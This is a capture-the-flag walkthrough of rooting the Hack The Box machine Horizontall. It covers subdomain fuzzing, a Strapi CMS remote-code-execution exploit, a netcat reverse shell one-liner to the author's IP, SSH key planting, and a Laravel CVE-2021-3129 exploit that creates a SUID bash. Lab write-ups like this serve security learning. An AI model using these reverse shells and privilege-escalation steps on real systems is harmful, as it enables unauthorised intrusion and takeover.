Hello everyone,Here I will explain how i managed to pwn Horizontall machine from HTB.

Recon

1. I started with nmap scanning for port scanning. what i found is just 2 ports:

22/tcp ssh, 80/tcp nginx 1.14.0

2. Let’s check port 80

Don't forget to add Machine-IP to `/etc/hosts`   as root run this ->  echo "10.10.11.105   horizontall.htb" >> /etc/hosts

• I enumerated site but found nothing.

3. Here i Decided to do directory brute-focrcing

   

• Found nothing too. :( Sad

4. So i jumped directly to Check for sub-domains & VHOSTS

ffuf -u http://horizontall.htb/ -H "Host: FUZZ.horizontall.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 -mc 200 -v

• And yeeeey!!! found VHOSTS.

  

Let’s add those sub-domains to /etc/hosts as root

5. Now, we know that www will open the main page of Site, so I checked api-prod and main page is ->

   

• By directory brute-forcing on this VHOST i found some Valuable Dirs:

  

6. By checking /reviews, /users we got 3 names john, doe, wail Note them.
7. Then checked /admin and got a Login form for Strapi-CMS

   

8. Tried to using default Cred like admin:admin and some SQLi, but nothing worked.
9. Then i tried to know the version of CMS from the site itself, maybe it’s vulnerable.

• by view page source i found 2 js files start to enumerating them.
• Searching in Strapi docs i found that we can know version from this line strapi-plugin-content-typeplugin cause it is always activated, by searching for it i found this.

  

---

Foothold

1. using searchsploit strapi i got Strapi 3.0.0-beta.17.7 RCE

• I had a problem with this script so i used this one CVE-2021-3129

2. We will use it by running exploit script. then write reverse shell cmd inside script rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 4444 >/tmp/f.

   

• After script running will give to us the valid Cred for admin as we see in 1.

Don’t forget to run listener first nc -nlvp 4444.

• then we can write our reverse shell command as you see in 2.

3. Now we got a shell as strapi user. we can read some files from developer user.

   

4. Starting to enumerating for any passwd or ssh keys by searching for password, id_rsa, authorized_keys. and i got one under /opt/strapi/.ssh/authorized_keys
5. I have a write permission on this folder .ssh/cause i’m owner of this,

• So, I created a ssh key to access via ssh.

ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

• And copied id_rsa private key to my machine to connect with it.

---

Privilege Escalation

1. Now, i’m connected via ssh
2. After some enumeration in the target machine.

• using find / -perm /4000 2>/dev/null got nothing.
• Searching for any files or services running can exploit.

3. By enumerating open ports netstat -ano, i got some new ports that not appear to me in port scanning.

   

• I found 3 ports running locally, as we know 3306 is for mysql Database, 1337 for strapi api if you read exploit script will know.

4. So, I checked 8000/tcp by using curl 127.0.0.1:8000

• i found another site running locally with title laravel

  

5. So to View it in browser and Enumerate it we need to make a port forwarding.

• Running ssh -L 8000:127.0.0.1:8000 strapi@10.10.11.105 -i id_rsa will start port forwarding.
• It’s a simple site with laravel, by enumerating this website will find in footer of page version of framework Laravel v8 (PHP v7.4.18).

  

6. so i searched for exploit for it, maybe it’s vulnerable, and i found 2 exploit

   

• one was XSS and i didn’t need it, and second was RCE via Debug mode.
• I tried to run this script but have some problems in the code itself.

7. So after some searching I found another one which worked for me, you can get it from here -> CVE-2021-3129

• So i run this exploit script from my machine on the forwarded port.

  

8. Last step that i got a full shell as root.

• Running the exploit script to copping bash shell as root then running it.
• Running from my Machine too.

$ ./exploit.py http://127.0.0.1:8000 Monolog/RCE1 "cp /bin/bash /tmp/bash; chmod +s /tmp/bash"

• back to the ssh strapi shell and run /tmp/bash -p

  

Congrats!!!! you now A full Root ….. xD

Hint: For fast rooting we can use pkexec CVE-2021-4034 but it’s not the good way to pwn machine xD. PoC ==>